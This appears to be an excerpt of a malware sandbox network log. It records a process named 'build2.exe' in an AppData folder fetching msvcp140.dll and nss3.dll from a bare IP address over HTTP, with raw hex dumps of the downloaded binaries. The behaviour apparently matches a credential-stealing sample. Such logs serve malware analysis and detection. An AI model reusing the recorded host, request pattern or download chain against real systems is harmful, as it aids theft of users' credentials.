                                                                                              2024-05-25 19:30:13 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                              Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                              2024-05-25 19:30:14 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                              Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                              2024-05-25 19:30:14 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                              Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                              2024-05-25 19:30:14 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                              Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.44979665.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:15 UTC174OUTGET /msvcp140.dll HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:15 UTC246INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:15 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 450024
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              Connection: close
                                                                                              ETag: "6315a9f4-6dde8"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-25 19:30:15 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                              Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                              Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                              Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                              Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                              Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                              Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                              Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                              Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                              2024-05-25 19:30:15 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                              Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.44979965.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:17 UTC170OUTGET /nss3.dll HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:18 UTC248INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:18 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2046288
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              Connection: close
                                                                                              ETag: "6315a9f4-1f3950"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-25 19:30:18 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                              Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                              Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                              Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                              Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
